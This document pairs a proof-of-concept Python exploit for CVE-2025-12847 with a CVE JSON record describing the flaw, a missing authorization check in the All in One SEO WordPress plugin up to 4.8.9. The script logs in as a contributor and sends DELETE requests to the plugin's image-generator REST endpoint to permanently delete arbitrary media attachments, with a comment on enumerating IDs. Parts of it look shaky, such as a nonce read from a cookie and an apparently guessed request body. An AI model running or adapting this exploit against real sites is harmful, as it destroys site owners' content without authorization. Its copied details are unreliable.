CVE-2025-12847

import requests import json # CVE-2025-12847 PoC - All in One SEO Plugin Unauthorized Media Deletion # Target: WordPress site with All in One SEO plugin <= 4.8.9 target_url = "http://target-wordpress-site.com" api_endpoint = "/wp-json/aioseo/v1/ai/image-generator" # Authentication - Contributor level account required session = requests.Session() # Login to WordPress (replace with valid credentials) login_url = f"{target_url}/wp-login.php" login_data = { "log": "attacker_username", "pwd": "attacker_password" } session.post(login_url, data=login_data) # Craft DELETE request to delete arbitrary media attachment # Replace ATTACHMENT_ID with target media ID attachment_id = "123" # Target attachment ID to delete delete_url = f"{target_url}{api_endpoint}" headers = { "Content-Type": "application/json", "X-WP-Nonce": session.cookies.get("wordpress_logged_in_...") # Get from logged in session } # Payload to delete media attachment payload = { "action": "delete", "attachment_id": attachment_id } # Send deletion request response = session.delete(delete_url, json=payload, headers=headers) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") # Note: Requires valid attachment ID and Contributor+ access # Attachment IDs can be enumerated via /wp-json/wp/v2/media endpoint

{"cve": {"id": "CVE-2025-12847", "sourceIdentifier": "[email protected]", "published": "2025-11-15T06:15:43.383", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic plugin for WordPress is vulnerable to unauthorized arbitrary media attachment deletion due to a missing authorization check in all versions up to, and including, 4.8.9. This is due to the REST API endpoint `/wp-json/aioseo/v1/ai/image-generator` only verifying that users have the `edit_posts` capability (Contributors and above) without checking if they own or have permission to delete the specific media attachments. This makes it possible for authenticated attackers, with Contributor-level access and above, to permanently delete arbitrary media attachments by ID via the REST API, granted they can determine valid attachment IDs."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/all-in-one-seo-pack/tags/4.8.9/app/Common/Ai/Image.php#L192", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/all-in-one-seo-pack/tags/4.8.9/app/Common/Api/Ai.php#L542", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/all-in-one-seo-pack/tags/4.8.9/app/Common/Api/Api.php#L192", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/all-in-one-seo-pack/tags/4.8.9/app/Common/Utils/Access.php#L184", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3393820%40all-in-one-seo-pack&old=3384131%40all-in-one-seo-pack&sfp_email=&sfph_mail=#file1387", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/05abc09f-903b-45a9-8cde-1bf8fd5d7d44?source=cve", "source": "[email protected]"}]}}